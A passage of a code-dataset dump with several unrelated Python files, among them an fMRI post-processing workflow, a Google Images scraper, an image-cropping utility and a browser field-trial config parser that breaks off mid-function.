\"\n\t\tcopyfile('./Database/Threats.sqlite','./UnitTest/UnitTestThreats.sqlite')\n\t\tself.enrichObj.set_sqlDBloc('./Database/UnitTestThreats.sqlite')\n\n\n","sub_path":"Backend_Processor/DownloadAgent/UnitTest/Test_LocateGeoIP.py","file_name":"Test_LocateGeoIP.py","file_ext":"py","file_size_in_byte":3150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"573109401","text":"n=int(input())\n\norg = input()\ns= []\nfor e in org:\n s.append(e)\n\nwhile(123-ord(max(s)) <=n):\n i= s.index(max(s))\n c = max(s)\n t = 123- ord(c)\n s[i] = chr( ord(c) - (26- t))\n n= n-t\n\nl = len(s)-1\ns[l] = chr(ord(s[l]) + n)\nprint(s)\n \n \n","sub_path":"lexicography.py","file_name":"lexicography.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"149231646","text":"# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-\n# vi: set ft=python sts=4 ts=4 sw=4 et:\n\"\"\"\npost processing the bold\n^^^^^^^^^^^^^^^^^^^^^^^^\n.. autofunction:: init_boldpostprocess_wf\n\n\"\"\"\nimport sys\nimport os\nimport numpy as np\nimport nibabel as nb\nfrom nipype import __version__ as nipype_ver\nfrom nipype.pipeline import engine as pe\nfrom nipype.interfaces import utility as niu\nfrom nipype import logging\nimport sklearn\nfrom ..interfaces import computeqcplot\nfrom niworkflows.engine.workflows import LiterateWorkflow as Workflow\nfrom ..utils import (bid_derivative, stringforparams,get_maskfiles,\n get_transformfilex,get_transformfile)\nfrom ..interfaces import FunctionalSummary\nfrom templateflow.api import get as get_template\nfrom niworkflows.interfaces.fixes import FixHeaderApplyTransforms as ApplyTransforms\nfrom nipype.interfaces.afni import Despike\nfrom ..interfaces import (ConfoundMatrix,FilteringData,regress)\nfrom ..interfaces import interpolate\nfrom .postprocessing import init_censoring_wf,init_resd_smoohthing\nfrom .execsummary import init_execsummary_wf\nfrom num2words import num2words\n#from postprocessing import stringforparams\n\nfrom ..workflow import (init_fcon_ts_wf,\n init_compute_alff_wf,\n init_3d_reho_wf)\nfrom .outputs import init_writederivatives_wf\nfrom xcp_abcd import workflow\n\nLOGGER = logging.getLogger('nipype.workflow')\n\n\n\ndef init_boldpostprocess_wf(\n lower_bpf,\n upper_bpf,\n contigvol,\n bpf_order,\n motion_filter_order,\n motion_filter_type,\n band_stop_min,\n band_stop_max,\n smoothing,\n bold_file,\n head_radius,\n params,\n custom_conf,\n omp_nthreads,\n dummytime,\n output_dir,\n fd_thresh,\n num_bold,\n mni_to_t1w,\n despike,\n brain_template='MNI152NLin2009cAsym',\n layout=None,\n name='bold_postprocess_wf',\n ):\n\n \"\"\"\n This workflow organizes bold processing workflow.\n Workflow Graph\n .. workflow::\n :graph2use: orig\n :simple_form: yes\n from xcp_abcd.workflow.bold import init_boldpostprocess_wf\n wf = init_boldpostprocess_wf(\n bold_file,\n lower_bpf,\n upper_bpf,\n contigvol,\n bpf_order,\n motion_filter_order,\n motion_filter_type,\n band_stop_min,\n band_stop_max,\n smoothing,\n head_radius,\n params,\n custom_conf,\n omp_nthreads,\n dummytime,\n output_dir,\n fd_thresh,\n num_bold,\n template='MNI152NLin2009cAsym',\n layout=None,\n name='bold_postprocess_wf',\n )\n Parameters\n ----------\n bold_file: str\n bold file for post processing\n lower_bpf : float\n Lower band pass filter\n upper_bpf : float\n Upper band pass filter\n layout : BIDSLayout object\n BIDS dataset layout\n contigvol: int\n number of contigious volumes\n despike: bool\n afni depsike\n motion_filter_order: int\n respiratory motion filter order\n motion_filter_type: str\n respiratory motion filter type: lp or notch\n band_stop_min: float\n respiratory minimum frequency in breathe per minutes(bpm)\n band_stop_max,: float\n respiratory maximum frequency in breathe per minutes(bpm)\n layout : BIDSLayout object\n BIDS dataset layout\n omp_nthreads : int\n Maximum number of threads an individual process may use\n output_dir : str\n Directory in which to save xcp_abcd output\n fd_thresh\n Criterion for flagging framewise displacement outliers\n head_radius : float\n radius of the head for FD computation\n params: str\n nuissance regressors to be selected from fmriprep regressors\n smoothing: float\n smooth the derivatives output with kernel size (fwhm)\n custom_conf: str\n path to cusrtom nuissance regressors\n dummytime: float\n the first vols in seconds to be removed before postprocessing\n\n Inputs\n ------\n bold_file\n BOLD series NIfTI file\n mni_to_t1w\n MNI to T1W ants Transformation file/h5\n ref_file\n Bold reference file from fmriprep\n bold_mask\n bold_mask from fmriprep\n cutstom_conf\n custom regressors\n\n Outputs\n -------\n processed_bold\n clean bold after regression and filtering\n smoothed_bold\n smoothed clean bold\n alff_out\n alff niifti\n smoothed_alff\n smoothed alff\n reho_out\n reho output computed by afni.3dreho\n sc217_ts\n schaefer 200 timeseries\n sc217_fc\n schaefer 200 func matrices\n sc417_ts\n schaefer 400 timeseries\n sc417_fc\n schaefer 400 func matrices\n gs360_ts\n glasser 360 timeseries\n gs360_fc\n glasser 360 func matrices\n gd333_ts\n gordon 333 timeseries\n gd333_fc\n gordon 333 func matrices\n qc_file\n quality control files\n \"\"\"\n\n\n TR = layout.get_tr(bold_file)\n file_base = os.path.basename(str(bold_file))\n workflow = Workflow(name=name)\n\n workflow.__desc__ = \"\"\"\nFor each of the {num_bold} BOLD series found per subject (across all\ntasks and sessions), the following post-processing was performed:\n\"\"\".format(num_bold=num2words(num_bold))\n\n if dummytime > 0:\n nvolx = str(np.floor(dummytime / TR))\n workflow.__desc__ = workflow.__desc__ + \"\"\" \\\nbefore nuisance regression and filtering of the data, the first {nvol} were discarded,\n.Furthermore,volumes with framewise-displacement greater than \n{fd_thresh} mm [@power_fd_dvars;@satterthwaite_2013] were flagged as outliers\n and excluded from nuisance regression.\n\"\"\".format(nvol=num2words(nvolx),fd_thresh=fd_thresh)\n\n else:\n workflow.__desc__ = workflow.__desc__ + \"\"\" \\\nbefore nuisance regression and filtering of the data, volumes with framewise-displacement greater than \n{fd_thresh} mm [@power_fd_dvars;@satterthwaite_2013] were flagged as outliers\n and excluded from nuisance regression.\n\"\"\".format(fd_thresh=fd_thresh)\n\n workflow.__desc__ = workflow.__desc__ + \"\"\" \\\n{regressors} [@benchmarkp;@satterthwaite_2013]. These nuisance regressors were \nregressed from the BOLD data using linear regression - as implemented in Scikit-Learn {sclver} [@scikit-learn].\nResidual timeseries from this regression were then band-pass filtered to retain signals within the {highpass}-{lowpass} Hz frequency band. \n \"\"\".format(regressors=stringforparams(params=params),sclver=sklearn.__version__,\n lowpass=upper_bpf,highpass=lower_bpf)\n\n\n # get reference and mask\n mask_file,ref_file = _get_ref_mask(fname=bold_file)\n\n inputnode = pe.Node(niu.IdentityInterface(\n fields=['bold_file','ref_file','bold_mask','cutstom_conf','mni_to_t1w','t1w','t1seg']),\n name='inputnode')\n\n inputnode.inputs.bold_file = str(bold_file)\n inputnode.inputs.ref_file = str(ref_file)\n inputnode.inputs.bold_mask = str(mask_file)\n inputnode.inputs.custom_conf = str(custom_conf)\n\n\n outputnode = pe.Node(niu.IdentityInterface(\n fields=['processed_bold', 'smoothed_bold','alff_out','smoothed_alff',\n 'reho_out','sc217_ts', 'sc217_fc','sc417_ts','sc417_fc','ts50_ts','ts50_fc',\n 'gs360_ts', 'gs360_fc','gd333_ts', 'gd333_fc','qc_file','fd']),\n name='outputnode')\n\n mem_gbx = _create_mem_gb(bold_file)\n\n\n fcon_ts_wf = init_fcon_ts_wf(mem_gb=mem_gbx['timeseries'],mni_to_t1w=mni_to_t1w,\n t1w_to_native=_t12native(bold_file),bold_file=bold_file,\n brain_template=brain_template,name=\"fcons_ts_wf\")\n\n alff_compute_wf = init_compute_alff_wf(mem_gb=mem_gbx['timeseries'], TR=TR,\n lowpass=upper_bpf,highpass=lower_bpf,smoothing=smoothing, cifti=False,\n name=\"compute_alff_wf\" )\n\n reho_compute_wf = init_3d_reho_wf(mem_gb=mem_gbx['timeseries'],smoothing=smoothing,\n name=\"afni_reho_wf\")\n\n write_derivative_wf = init_writederivatives_wf(smoothing=smoothing,bold_file=bold_file,\n params=params,cifti=None,output_dir=output_dir,dummytime=dummytime,\n lowpass=upper_bpf,highpass=lower_bpf,TR=TR,omp_nthreads=omp_nthreads,\n name=\"write_derivative_wf\")\n\n confoundmat_wf = pe.Node(ConfoundMatrix(head_radius=head_radius, params=params,\n filtertype=motion_filter_type,cutoff=band_stop_max,\n low_freq=band_stop_max,high_freq=band_stop_min,TR=TR,\n filterorder=motion_filter_order),\n name=\"ConfoundMatrix_wf\", mem_gb=mem_gbx['resampled'])\n\n censorscrub_wf = init_censoring_wf(mem_gb=mem_gbx['timeseries'],TR=TR,custom_conf=custom_conf,head_radius=head_radius,\n contigvol=contigvol,dummytime=dummytime,fd_thresh=fd_thresh,name='censoring')\n \n resdsmoothing_wf = init_resd_smoohthing(mem_gb=mem_gbx['timeseries'],smoothing=smoothing,cifti=False,\n name=\"resd_smoothing_wf\")\n \n filtering_wf = pe.Node(FilteringData(tr=TR,lowpass=upper_bpf,highpass=lower_bpf,\n filter_order=bpf_order),\n name=\"filtering_wf\", mem_gb=mem_gbx['timeseries'])\n\n regression_wf = pe.Node(regress(tr=TR),\n name=\"regression_wf\",mem_gb = mem_gbx['timeseries'])\n\n interpolate_wf = pe.Node(interpolate(TR=TR),\n name=\"interpolation_wf\",mem_gb = mem_gbx['timeseries'])\n\n \n executivesummary_wf =init_execsummary_wf(tr=TR,bold_file=bold_file,layout=layout,\n output_dir=output_dir,mni_to_t1w=mni_to_t1w,omp_nthreads=2)\n \n\n # get transform file for resampling and fcon\n \n \n \n transformfile = get_transformfile(bold_file=bold_file,\n mni_to_t1w=mni_to_t1w,t1w_to_native=_t12native(bold_file))\n t1w_mask = get_maskfiles(bold_file=bold_file,mni_to_t1w=mni_to_t1w)[1]\n\n bold2MNI_trans,bold2T1w_trans = get_transformfilex(bold_file=bold_file,\n mni_to_t1w=mni_to_t1w,t1w_to_native=_t12native(bold_file)) \n\n \n resample_parc = pe.Node(ApplyTransforms(\n dimension=3,\n input_image=str(get_template(\n 'MNI152NLin2009cAsym', resolution=1, desc='carpet',\n suffix='dseg', extension=['.nii', '.nii.gz'])),\n interpolation='MultiLabel',transforms=transformfile),\n name='resample_parc')\n \n resample_bold2T1w = pe.Node(ApplyTransforms(\n dimension=3,\n input_image=mask_file,reference_image=t1w_mask,\n interpolation='NearestNeighbor',transforms=bold2T1w_trans),\n name='bold2t1_trans')\n \n resample_bold2MNI = pe.Node(ApplyTransforms(\n dimension=3,\n input_image=mask_file,reference_image=str(get_template(\n 'MNI152NLin2009cAsym', resolution=2, desc='brain',\n suffix='mask', extension=['.nii', '.nii.gz'])),\n interpolation='NearestNeighbor',transforms=bold2MNI_trans),\n name='bold2mni_trans')\n\n qcreport = pe.Node(computeqcplot(TR=TR,bold_file=bold_file,dummytime=dummytime,t1w_mask=t1w_mask,\n template_mask = str(get_template('MNI152NLin2009cAsym', resolution=2, desc='brain',\n suffix='mask', extension=['.nii', '.nii.gz'])),\n head_radius=head_radius), name=\"qc_report\",mem_gb = mem_gbx['resampled'])\n \n\n workflow.connect([\n # connect bold confound matrix to extract confound matrix \n (inputnode, confoundmat_wf, [('bold_file', 'in_file'),]),\n ])\n \n # if there is despiking\n if despike:\n despike_wf = pe.Node(Despike(outputtype='NIFTI_GZ',args='-NEW'),name=\"despike_wf\",mem_gb=mem_gbx['resampled'])\n\n workflow.connect([\n (inputnode,despike_wf,[('bold_file','in_file')]),\n (despike_wf,censorscrub_wf,[('out_file','inputnode.bold')])\n ])\n else:\n workflow.connect([\n (inputnode,censorscrub_wf,[('bold_file','inputnode.bold')]),\n ])\n \n # add neccessary input for censoring if there is one\n workflow.connect([\n\t (inputnode,censorscrub_wf,[('bold_file','inputnode.bold_file'),\n\t ('bold_mask','inputnode.bold_mask')]),\n\t (confoundmat_wf,censorscrub_wf,[('confound_file','inputnode.confound_file')])\n ])\n\n # regression workflow \n workflow.connect([\n\t (inputnode,regression_wf,[('bold_mask','mask')]),\n\t (censorscrub_wf,regression_wf,[('outputnode.bold_censored','in_file'),\n\t ('outputnode.fmriprepconf_censored','confounds'), \n\t\t ('outputnode.customconf_censored','custom_conf')])\n ])\n # interpolation workflow\n workflow.connect([\n\t (inputnode,interpolate_wf,[('bold_file','bold_file'),('bold_mask','mask_file')]),\n\t (censorscrub_wf,interpolate_wf,[('outputnode.tmask','tmask')]),\n\t (regression_wf,interpolate_wf,[('res_file','in_file')]), \n\t])\n # add filtering workflow \n workflow.connect([\n (inputnode,filtering_wf,[('bold_mask','mask')]),\n\t (interpolate_wf,filtering_wf,[('bold_interpolated','in_file')]),\n\n ])\n \n # residual smoothing \n workflow.connect([\n\t (filtering_wf,resdsmoothing_wf,[('filt_file','inputnode.bold_file')]) \n ])\n\n #functional connect workflow\n workflow.connect([\n (inputnode,fcon_ts_wf,[('ref_file','inputnode.ref_file'),]),\n (filtering_wf,fcon_ts_wf,[('filt_file','inputnode.clean_bold'),]),\n ])\n # reho and alff\n workflow.connect([ \n\t (inputnode,alff_compute_wf,[('bold_mask','inputnode.bold_mask')]),\n\t (inputnode,reho_compute_wf,[('bold_mask','inputnode.bold_mask')]),\n\t (filtering_wf, alff_compute_wf,[('filt_file','inputnode.clean_bold')]),\n\t (filtering_wf, reho_compute_wf,[('filt_file','inputnode.clean_bold')]),\n ])\n\n # qc report\n workflow.connect([\n (inputnode,qcreport,[('bold_mask','mask_file')]),\n (filtering_wf,qcreport,[('filt_file','cleaned_file')]),\n (censorscrub_wf,qcreport,[('outputnode.tmask','tmask')]),\n (inputnode,resample_parc,[('ref_file','reference_image')]),\n (resample_parc,qcreport,[('output_image','seg_file')]),\n (resample_bold2T1w,qcreport,[('output_image','bold2T1w_mask')]),\n (resample_bold2MNI,qcreport,[('output_image','bold2temp_mask')]),\n (qcreport,outputnode,[('qc_file','qc_file')]),\n ])\n\n \n\n # write to the outputnode, may be use in future\n workflow.connect([\n\t(filtering_wf,outputnode,[('filt_file','processed_bold')]),\n\t(censorscrub_wf,outputnode,[('outputnode.fd','fd')]),\n\t(resdsmoothing_wf,outputnode,[('outputnode.smoothed_bold','smoothed_bold')]),\n\t(alff_compute_wf,outputnode,[('outputnode.alff_out','alff_out'),\n ('outputnode.smoothed_alff','smoothed_alff')]),\n (reho_compute_wf,outputnode,[('outputnode.reho_out','reho_out')]),\n\t (fcon_ts_wf,outputnode,[('outputnode.sc217_ts','sc217_ts' ),('outputnode.sc217_fc','sc217_fc'),\n ('outputnode.sc417_ts','sc417_ts'),('outputnode.sc417_fc','sc417_fc'),\n ('outputnode.gs360_ts','gs360_ts'),('outputnode.gs360_fc','gs360_fc'),\n ('outputnode.gd333_ts','gd333_ts'),('outputnode.gd333_fc','gd333_fc'),\n ('outputnode.ts50_ts','ts50_ts'),('outputnode.ts50_fc','ts50_fc')]),\n\n ])\n \n # write derivatives \n workflow.connect([\n (filtering_wf,write_derivative_wf,[('filt_file','inputnode.processed_bold')]),\n\t (resdsmoothing_wf,write_derivative_wf,[('outputnode.smoothed_bold','inputnode.smoothed_bold')]),\n (censorscrub_wf,write_derivative_wf,[('outputnode.fd','inputnode.fd')]),\n (alff_compute_wf,write_derivative_wf,[('outputnode.alff_out','inputnode.alff_out'),\n ('outputnode.smoothed_alff','inputnode.smoothed_alff')]),\n (reho_compute_wf,write_derivative_wf,[('outputnode.reho_out','inputnode.reho_out')]),\n (fcon_ts_wf,write_derivative_wf,[('outputnode.sc217_ts','inputnode.sc217_ts' ),\n ('outputnode.sc217_fc','inputnode.sc217_fc'),\n ('outputnode.sc417_ts','inputnode.sc417_ts'),\n ('outputnode.sc417_fc','inputnode.sc417_fc'),\n ('outputnode.gs360_ts','inputnode.gs360_ts'),\n ('outputnode.gs360_fc','inputnode.gs360_fc'),\n ('outputnode.gd333_ts','inputnode.gd333_ts'),\n ('outputnode.gd333_fc','inputnode.gd333_fc'),\n ('outputnode.ts50_ts','inputnode.ts50_ts'),\n ('outputnode.ts50_fc','inputnode.ts50_fc')]),\n (qcreport,write_derivative_wf,[('qc_file','inputnode.qc_file')]),\n\n\n\n ])\n functional_qc = pe.Node(FunctionalSummary(bold_file=bold_file,tr=TR),\n name='qcsummary', run_without_submitting=True)\n\n ds_report_qualitycontrol = pe.Node(\n DerivativesDataSink(base_directory=output_dir, desc='qualitycontrol',source_file=bold_file, datatype=\"figures\"),\n name='ds_report_qualitycontrol', run_without_submitting=True)\n\n ds_report_preprocessing = pe.Node(\n DerivativesDataSink(base_directory=output_dir, desc='preprocessing',source_file=bold_file, datatype=\"figures\"),\n name='ds_report_preprocessing', run_without_submitting=True)\n ds_report_postprocessing = pe.Node(\n DerivativesDataSink(base_directory=output_dir,source_file=bold_file, desc='postprocessing', datatype=\"figures\"),\n name='ds_report_postprocessing', run_without_submitting=True)\n\n ds_report_connectivity = pe.Node(\n DerivativesDataSink(base_directory=output_dir,source_file=bold_file, desc='connectvityplot', datatype=\"figures\"),\n name='ds_report_connectivity', run_without_submitting=True)\n\n ds_report_rehoplot = pe.Node(\n DerivativesDataSink(base_directory=output_dir,source_file=bold_file, desc='rehoplot', datatype=\"figures\"),\n name='ds_report_rehoplot', run_without_submitting=True)\n\n ds_report_afniplot = pe.Node(\n DerivativesDataSink(base_directory=output_dir,source_file=bold_file, desc='afniplot', datatype=\"figures\"),\n name='ds_report_afniplot', run_without_submitting=True)\n\n workflow.connect([\n (qcreport,ds_report_preprocessing,[('raw_qcplot','in_file')]),\n (qcreport,ds_report_postprocessing ,[('clean_qcplot','in_file')]),\n (qcreport,functional_qc,[('qc_file','qc_file')]),\n (functional_qc,ds_report_qualitycontrol,[('out_report','in_file')]),\n (fcon_ts_wf,ds_report_connectivity,[('outputnode.connectplot','in_file')]),\n (reho_compute_wf,ds_report_rehoplot,[('outputnode.rehohtml','in_file')]),\n (alff_compute_wf,ds_report_afniplot ,[('outputnode.alffhtml','in_file')]),\n ])\n\n\n ## exexetive summary workflow\n workflow.connect([\n (inputnode,executivesummary_wf,[('t1w','inputnode.t1w'),('t1seg','inputnode.t1seg'),\n ('bold_file','inputnode.bold_file'),('bold_mask','inputnode.mask')]),\n\n (regression_wf,executivesummary_wf,[('res_file','inputnode.regdata'),]),\n (filtering_wf,executivesummary_wf,[('filt_file','inputnode.resddata')]),\n (censorscrub_wf,executivesummary_wf,[('outputnode.fd','inputnode.fd')]),\n ]),\n\n return workflow\n\n\n\n\n\ndef _create_mem_gb(bold_fname):\n bold_size_gb = os.path.getsize(bold_fname) / (1024**3)\n bold_tlen = nb.load(bold_fname).shape[-1]\n mem_gbz = {\n 'derivative': bold_size_gb,\n 'resampled': bold_size_gb * 4,\n 'timeseries': bold_size_gb * (max(bold_tlen/100, 1.0) + 4),\n }\n\n return mem_gbz\n\ndef _get_ref_mask(fname):\n directx = os.path.dirname(fname)\n filename = filename=os.path.basename(fname)\n filex = filename.split('preproc_bold.nii.gz')[0] + 'brain_mask.nii.gz'\n filez = filename.split('_desc-preproc_bold.nii.gz')[0] +'_boldref.nii.gz'\n mask = directx + '/' + filex\n ref = directx + '/' + filez\n return mask, ref\n\ndef _t12native(fname):\n directx = os.path.dirname(fname)\n filename = os.path.basename(fname)\n fileup = filename.split('desc-preproc_bold.nii.gz')[0].split('space-')[0]\n\n t12ref = directx + '/' + fileup + 'from-T1w_to-scanner_mode-image_xfm.txt'\n\n return t12ref\n\n\nclass DerivativesDataSink(bid_derivative):\n out_path_base = 'xcp_abcd'\n ","sub_path":"xcp_abcd/workflow/bold.py","file_name":"bold.py","file_ext":"py","file_size_in_byte":20669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"419221481","text":"from abc import ABC, abstractmethod\nimport logger\nimport cfg_sonos\n\n\nclass Device(ABC):\n @abstractmethod\n def is_alive(self):\n raise NotImplementedError\n\n def __init__(self, service_name):\n self.service_name = service_name\n self.logger = logger.Logger(service_name).logger\n self.cfg = cfg_sonos.Cfg()\n","sub_path":"SonosClient/device.py","file_name":"device.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"405716335","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nimport time\nimport urllib.request\nfrom bs4 import BeautifulSoup as bs\nimport re\nimport os\n\n\ngoogle_url_part1 = 'https://www.google.com/search?q='\ngoogle_url_part2 = '&source=lnms&tbm=isch'\nsearch_query = '停车' \nlocation_driver = 'C:/Users/HR/AppData/Local/Google/Chrome/Application/chromedriver.exe'\nurl = google_url_part1 + search_query + google_url_part2\nchrome_options = Options()\nchrome_options.add_argument(\"--disable-infobars\")\ndriver = webdriver.Chrome(executable_path=location_driver, chrome_options=chrome_options)\ndriver.maximize_window()\ndriver.get(url)\nimg_url_dic = {}\ncount = 0\ntarget_num = 3\npos = 0\nfor i in range(1): \n pos = i * 500 \n js = \"document.documentElement.scrollTop=%d\" % pos\n driver.execute_script(js)\n time.sleep(1)\n html_page = driver.page_source\n soup = bs(html_page, \"html.parser\")\n img_list = soup.findAll('img', {'class': 'rg_ic rg_i'})\n for img_url in img_list:\n try:\n print(count, end=' ')\n if img_url['src'] not in img_url_dic:\n target = '{}.jpg'.format(count)\n img_url_dic[img_url['src']] = ''\n urllib.request.urlretrieve(img_url['src'], target)\n count = count + 1\n if count == target_num:\n break\n except KeyError:\n continue\n if count == target_num:\n driver.close()\n\n","sub_path":"google_img.py","file_name":"google_img.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"263620277","text":"import cv2\nfrom param import CHARWIDTH,CHARHEIGHT\n\ndef cropedge(img):\n rows1=topdown(img)\n rows2=downtop(img)\n cols1=leftright(img)\n cols2=rightleft(img)\n if rows2==0 or cols2==0:\n print('zero!')\n return img[5:44,0:40]\n return img[rows1:rows2,cols1:cols2]\n\n\ndef ifemptyrow(img,row,cols):\n col=0\n while col < cols:\n if img[row,col] != 0:\n return False\n col=col+1\n return True\n\n\ndef ifemptycol(img,col,rows):\n row=0\n while row < rows:\n if img[row,col] != 0:\n return False\n row=row+1\n return True\n\n\ndef topdown(img):\n rows,cols=img.shape\n row=0\n temp=img\n while ifemptyrow(temp,0,cols):\n row=row+1\n temp=img[row:rows,0:cols]\n if temp.shape[0]==0:\n return row\n return row\n\n\ndef downtop(img):\n rows,cols=img.shape\n row=rows\n temp=img\n while ifemptyrow(temp,temp.shape[0]-1,cols):\n row=row-1\n temp=img[0:row,0:cols]\n if temp.shape[0]==0:\n return row\n return row\n\n\ndef leftright(img):\n rows,cols=img.shape\n col=0\n temp=img\n while ifemptycol(temp,0,rows):\n col=col+1\n temp=img[0:rows,col:cols]\n if temp.shape[1]==0:\n return col\n return col\n\n\ndef rightleft(img):\n rows,cols=img.shape\n col=cols\n temp=img\n while ifemptycol(temp,temp.shape[1]-1,rows):\n col=col-1\n temp=img[0:rows,0:col]\n if temp.shape[1]==0:\n return col\n return col\n","sub_path":"cropedge.py","file_name":"cropedge.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"280040378","text":"#!/usr/bin/env python\n# Copyright (c) 2015 Yandex LLC. All rights reserved.\n# Author: Kirill Kosarev \n\nimport argparse\nfrom collections import OrderedDict\nfrom collections import namedtuple\nfrom distutils.version import LooseVersion\nimport json\nimport logging\nimport os\nimport shutil\nimport sys\nimport tempfile\nimport urllib\nimport urllib2\nimport xml.etree.ElementTree as ET\n\nPROTO_FILE_URL = ('https://storage.ape.yandex.net/get/browser/'\n 'experiments/browser.proto')\nREPO_URL = ('https://bitbucket.browser.yandex-team.ru/projects'\n '/STARDUST/repos/browser-uploads/browse/')\nVARIATIONS_SEED = REPO_URL + 'Experiments/variations_seed_pb2.py?raw'\nSTUDY_PB2 = REPO_URL + 'Experiments/study_pb2.py?raw'\nFIELD_TRIALS_XML = os.path.join(os.path.dirname(__file__), '..', 'metrics',\n 'histograms', 'field_trials.xml')\nALL_SUPPORTED_PLATFORMS = ['linux', 'mac', 'win']\n\n# Initialized after loading STUDY_P2 module.\nPLATFORM_TYPES = None\nCHANNEL_BETA = None\nCHANNEL_STABLE = None\n\n#Experiment = namedtuple('Experiment',\n #['name', 'values', 'is_switch', 'is_obsolete', 'owner'])\nXMLDesc = namedtuple('XMLDesc', ['name', 'owner', 'description', 'obsolete'])\nCSVDesc = namedtuple('XMLDesc', ['name', 'owner', 'description', 'weight', 'value_str', 'obsolete'])\n\ndef _parse_variations(path, base_dir):\n if path:\n with open(path) as f:\n proto_data = f.read()\n else:\n proto_data = urllib2.urlopen(PROTO_FILE_URL).read()\n urllib.urlretrieve(VARIATIONS_SEED,\n os.path.join(base_dir, 'variations_seed_pb2.py'))\n urllib.urlretrieve(STUDY_PB2, os.path.join(base_dir, 'study_pb2.py'))\n sys.path.append(base_dir)\n\n from variations_seed_pb2 import VariationsSeed\n variations_seed = VariationsSeed()\n variations_seed.ParseFromString(proto_data)\n\n from study_pb2 import Study\n global PLATFORM_TYPES\n global CHANNEL_BETA\n global CHANNEL_STABLE\n PLATFORM_TYPES = {\n Study.PLATFORM_MAC: 'mac',\n Study.PLATFORM_WINDOWS: 'win',\n Study.PLATFORM_LINUX: 'linux',\n }\n CHANNEL_BETA = Study.BETA\n CHANNEL_STABLE = Study.STABLE\n return variations_seed\n\n\ndef _get_platforms(filter_platforms):\n if not filter_platforms:\n return ALL_SUPPORTED_PLATFORMS\n platforms = [PLATFORM_TYPES.get(v) for v in filter_platforms]\n return [p for p in platforms if p is not None]\n\n\ndef _get_most_relevant_experiment(study):\n exp = max(study.experiment, key=lambda e: int(e.probability_weight))\n weights_sum = sum(e.probability_weight for e in study.experiment)\n weight = float(exp.probability_weight) / weights_sum\n res = {'name': exp.name}\n if exp.feature_association:\n enabled_features = exp.feature_association.enable_feature\n disabled_features = exp.feature_association.disable_feature\n if enabled_features:\n res['enable_features'] = list(enabled_features)\n if disabled_features:\n res['disabled_features'] = list(disabled_features)\n if exp.param:\n res['params'] = dict((v.name, v.value) for v in exp.param)\n return res, weight\n\n\ndef _should_skip(study, chrome_version, yandex_version):\n filters = study.filter\n if filters.channel and not CHANNEL_STABLE in filters.channel:\n return True\n\n if chrome_version:\n if (filters.min_version and\n chrome_version < LooseVersion(filters.min_version)):\n logging.info('%s filtered by min version', study.name)\n return True\n if (filters.max_version and\n chrome_version > LooseVersion(filters.max_version)):\n logging.info('%s filtered by max version', study.name)\n return True\n\n if yandex_version:\n if (filters.ya_min_version and\n yandex_version < LooseVersion(filters.ya_min_version)):\n logging.info('%s filtered by ya_min version', study.name)\n return True\n if (filters.ya_max_version and\n yandex_version > LooseVersion(filters.ya_max_version)):\n logging.info('%s filtered by ya_max version', study.name)\n return True\n\n if filters.brand_id:\n return True\n\n if filters.partner_id:\n return True\n return False\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--chromium-version', type=LooseVersion)\n parser.add_argument('--yandex-version', type=LooseVersion)\n parser.add_argument('--verbose', '-v', action='store_true')\n parser.add_argument('--xml-description-file', type=str)\n parser.add_argument('--obsoletes-file', type=str)\n parser.add_argument('-o', '--output-file', type=str)\n parser.add_argument('input_file', nargs='?')\n return parser.parse_args()\n\n\ndef _parse_production_config(args):\n field_trials = {}\n tempdir = tempfile.mkdtemp()\n try:\n variations= _parse_variations(args.input_file, tempdir)\n finally:\n shutil.rmtree(tempdir)\n\n for study in variations.study:\n if _should_skip(study, args.chromium_version, args.yandex_version):\n continue\n\n experiment_value, experiment_weight = _get_most_relevant_experiment(study)\n studies_experiments = field_trials.setdefault(study.name, [])\n new_value = {\n 'platforms': _get_platforms(study.filter.platform),\n 'experiment': experiment_value,\n 'experiment_weight': experiment_weight\n }\n if not new_value in studies_experiments:\n studies_experiments.append(new_value)\n return field_trials\n\n\ndef _load_xml(file_path):\n res = {}\n xml_tree = ET.parse(file_path)\n root = xml_tree.getroot()\n for e in root.findall('experiment'):\n values = (\n [group.get('name') for group in e.findall('./groups/group')])\n is_obsolete = True if e.find('./obsolete') is not None else False\n res[e.get('name')] = XMLDesc(e.get('name'),\n e.find('./owner').text,\n e.find('./description').text,\n is_obsolete)\n return res\n\n\ndef _load_obsoletes(file_path):\n with open(file_path) as f:\n res = set([l.strip() for l in f])\n return res\n\n\ndef main():\n args = parse_args()\n if args.verbose:\n logging.basicConfig(level=logging.INFO)\n\n fieldtrials = _parse_production_config(args)\n xml_desc = _load_xml(args.xml_description_file)\n obsolete_experiments = _load_obsoletes(args.obsoletes_file)\n\n csv_descriptions = []\n for study_name, values in fieldtrials.iteritems():\n xml_study = xml_desc.get(study_name)\n obsolete_str = 'Possibly removed' if study_name in obsolete_experiments else ' '\n if xml_study:\n description_str = xml_study.description.replace('\\n', ' ').replace(';', ' ').strip()\n description_str = ' '.join(description_str.split())\n owner = xml_study.owner\n if xml_study.obsolete:\n obsolete_str = 'Removed'\n else:\n description_str = ' '\n owner = ' '\n\n value_dict = {}\n for v in values:\n for p in v['platforms']:\n if not p in value_dict:\n value_dict[p] = (v['experiment']['name'], v['experiment_weight'])\n value_str = ''\n\n if len(value_dict) == len(ALL_SUPPORTED_PLATFORMS) and len(set(value_dict.values())) == 1:\n value_str = 'all={}'.format(value_dict['win'][0])\n csv_descriptions.append(CSVDesc(\n study_name, owner, description_str,\n value_dict['win'][1], value_str, obsolete_str))\n elif len(value_dict):\n for k in sorted(value_dict.keys()):\n value_str = '{}={}'.format(k, value_dict[k][0])\n csv_descriptions.append(CSVDesc(\n 